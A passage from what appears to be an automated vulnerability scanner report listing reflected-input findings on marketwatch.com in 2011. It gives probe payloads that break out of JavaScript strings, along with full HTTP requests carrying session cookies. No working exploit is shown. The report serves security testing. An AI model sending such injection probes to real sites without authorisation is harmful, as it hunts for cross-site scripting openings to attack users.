The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10e11'%3b8180e7efad1 was submitted in the REST URL parameter 1. This input was echoed as 10e11';8180e7efad1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /bg10e11'%3b8180e7efad1/api/Connect.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off
Content-Length: 2

{}

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp03
Date: Sat, 14 May 2011 10:19:02 GMT
Content-Length: 50839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg10e11';8180e7efad1/api/Connect.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.94. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /bg/api/Connect.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbe05'%3b9bca35ec658 was submitted in the REST URL parameter 2. This input was echoed as dbe05';9bca35ec658 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /bg/apidbe05'%3b9bca35ec658/Connect.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off
Content-Length: 2

{}

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp04
Date: Sat, 14 May 2011 10:19:26 GMT
Content-Length: 50862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg/apidbe05';9bca35ec658/Connect.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.95. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /bg/api/Pickup.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 576c0'%3b39ce4880832 was submitted in the REST URL parameter 1. This input was echoed as 576c0';39ce4880832 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /bg576c0'%3b39ce4880832/api/Pickup.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off; rsi_csl=; rsi_segs=
Content-Length: 6314

c=%7B%22c%22%3A%22d71e124eb75a400681a0e3b95b460529%22%2C%22s%22%3A%2210.240.178.143%22%7D&m=%5B%7B%22h%22%3A%7B%22t%22%3A%22%2Fquotes%2Fcomstock%2F10w!i%3Adji%22%2C%22a%22%3A%22subscribe%22%7D%2C%22b%
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Sat, 14 May 2011 10:19:49 GMT
Content-Length: 50914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg576c0';39ce4880832/api/Pickup.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.96. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /bg/api/Pickup.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53699'%3b3aed18dbeed was submitted in the REST URL parameter 2. This input was echoed as 53699';3aed18dbeed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /bg/api53699'%3b3aed18dbeed/Pickup.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off; rsi_csl=; rsi_segs=
Content-Length: 6314

c=%7B%22c%22%3A%22d71e124eb75a400681a0e3b95b460529%22%2C%22s%22%3A%2210.240.178.143%22%7D&m=%5B%7B%22h%22%3A%7B%22t%22%3A%22%2Fquotes%2Fcomstock%2F10w!i%3Adji%22%2C%22a%22%3A%22subscribe%22%7D%2C%22b%
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp05
Date: Sat, 14 May 2011 10:20:10 GMT
Content-Length: 50890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg/api53699';3aed18dbeed/Pickup.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.97. http://www.marketwatch.com/doubleclick/DARTIframe.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /doubleclick/DARTIframe.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b5fe'%3b9ea664612a2 was submitted in the REST URL parameter 1. This input was echoed as 6b5fe';9ea664612a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /doubleclick6b5fe'%3b9ea664612a2/DARTIframe.html?adParams=queId%3D1304622833178%26thirdPartyImpUrl%3Dhttp%253A//ad.doubleclick.net/ad/N3941.marketwatch.com/B5325532.17%253Bsz%253D1x1%253Bpc%253DDFP240691320%253Bord%253D3068525%253F%26thirdPartyFlashDisplayUrl%3D%26thirdPartyBackupImpUrl%3D%26surveyUrl%3D%26googleContextDiscoveryUrl%3Dhttp%253A//pagead2.googlesyndication.com/pagead/ads%253Fclient%253Ddclk-3pas-query%2526output%253Dxml%2526geo%253Dtrue%26livePreviewSiteUrl%3D%2525LivePreviewSiteUrl%26customScriptFileUrl%3D%26servingMethod%3Di%26mode%3DFlash%26isHTML5Creative%3Dfalse%26isHTML5PreviewMode%3Dfalse%26forceHTML5Creative%3Dfalse%26macro_j%3D910903057632460979-1018090093%26macro_eenv%3Di%26macro_g%3Dct%253DUS%2526st%253DVT%2526ac%253D802%2526zp%253D05672%2526bw%253D4%2526dma%253D25%2526city%253D17565%26macro_s%3Dmarketwatch.com%26macro_eaid%3D240691320%26macro_n%3D3068525%26macro_m%3D910903057632460979%26macro_erid%3D41996359%26macro_ebuy%3D5407031%26macro_ecid%3D41978572%26macro_erv%3D1%26macro_epid%3D13112443%26macro_eadv%3D1363789%26macro_esid%3D377367%26macro_ekid%3D0%26csiBaseline%3D1305367984368%26csiAdRespTime%3DNaN%26shouldDisplayFlashAsset%3Dtrue%26globalTemplateJs%3Dhttp%253A//s0.2mdn.net/879366/expandingIframeGlobalTemplate_v2_59_09.js&gtVersion=59_09&mediaserver=http%3A//s0.2mdn.net/879366&cid=GlobalTemplate_13046228331781305367984368&index=0 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/marketwatch.com/frontpage;u=%5e%5e;sz=250x26;tile=2;ord=1820011674?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-MACHINE: sbkdfpswebp01
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:20:59 GMT
Content-Length: 52318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/doubleclick6b5fe';9ea664612a2/DARTIframe.html';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.98. http://www.marketwatch.com/doubleclick/DARTIframe.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /doubleclick/DARTIframe.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c3f9'%3b8adafa61384 was submitted in the REST URL parameter 2. This input was echoed as 1c3f9';8adafa61384 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /doubleclick/DARTIframe.html1c3f9'%3b8adafa61384?adParams=queId%3D1304622833178%26thirdPartyImpUrl%3Dhttp%253A//ad.doubleclick.net/ad/N3941.marketwatch.com/B5325532.17%253Bsz%253D1x1%253Bpc%253DDFP240691320%253Bord%253D3068525%253F%26thirdPartyFlashDisplayUrl%3D%26thirdPartyBackupImpUrl%3D%26surveyUrl%3D%26googleContextDiscoveryUrl%3Dhttp%253A//pagead2.googlesyndication.com/pagead/ads%253Fclient%253Ddclk-3pas-query%2526output%253Dxml%2526geo%253Dtrue%26livePreviewSiteUrl%3D%2525LivePreviewSiteUrl%26customScriptFileUrl%3D%26servingMethod%3Di%26mode%3DFlash%26isHTML5Creative%3Dfalse%26isHTML5PreviewMode%3Dfalse%26forceHTML5Creative%3Dfalse%26macro_j%3D910903057632460979-1018090093%26macro_eenv%3Di%26macro_g%3Dct%253DUS%2526st%253DVT%2526ac%253D802%2526zp%253D05672%2526bw%253D4%2526dma%253D25%2526city%253D17565%26macro_s%3Dmarketwatch.com%26macro_eaid%3D240691320%26macro_n%3D3068525%26macro_m%3D910903057632460979%26macro_erid%3D41996359%26macro_ebuy%3D5407031%26macro_ecid%3D41978572%26macro_erv%3D1%26macro_epid%3D13112443%26macro_eadv%3D1363789%26macro_esid%3D377367%26macro_ekid%3D0%26csiBaseline%3D1305367984368%26csiAdRespTime%3DNaN%26shouldDisplayFlashAsset%3Dtrue%26globalTemplateJs%3Dhttp%253A//s0.2mdn.net/879366/expandingIframeGlobalTemplate_v2_59_09.js&gtVersion=59_09&mediaserver=http%3A//s0.2mdn.net/879366&cid=GlobalTemplate_13046228331781305367984368&index=0 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/marketwatch.com/frontpage;u=%5e%5e;sz=250x26;tile=2;ord=1820011674?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Sat, 14 May 2011 10:21:23 GMT
Content-Length: 52296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/doubleclick/DARTIframe.html1c3f9';8adafa61384';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.99. http://www.marketwatch.com/news/Headline/_HeadlineItem [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/Headline/_HeadlineItem

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95487'%3b4ce0dc04769 was submitted in the REST URL parameter 3. This input was echoed as 95487';4ce0dc04769 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/Headline/_HeadlineItem95487'%3b4ce0dc04769 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp03
Date: Sat, 14 May 2011 11:03:10 GMT
Content-Length: 50879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news/Headline/_HeadlineItem95487';4ce0dc04769';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.100. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23f1f'%3b9ca0a5d917e was submitted in the REST URL parameter 1. This input was echoed as 23f1f';9ca0a5d917e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story23f1f'%3b9ca0a5d917e/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp02
Date: Sat, 14 May 2011 10:42:46 GMT
Content-Length: 51307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/story23f1f';9ca0a5d917e/citigroups-new-look-is-plainly-cosmetic-2011-05-13';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.101. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9921'%3b72a080b99e0 was submitted in the REST URL parameter 1. This input was echoed as c9921';72a080b99e0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /storyc9921'%3b72a080b99e0/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A4%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: secdedtwebp01
Date: Sat, 14 May 2011 10:45:23 GMT
Content-Length: 51272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/storyc9921';72a080b99e0/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.102. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd171'%3b895992777ed was submitted in the REST URL parameter 1. This input was echoed as bd171';895992777ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /storybd171'%3b895992777ed/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
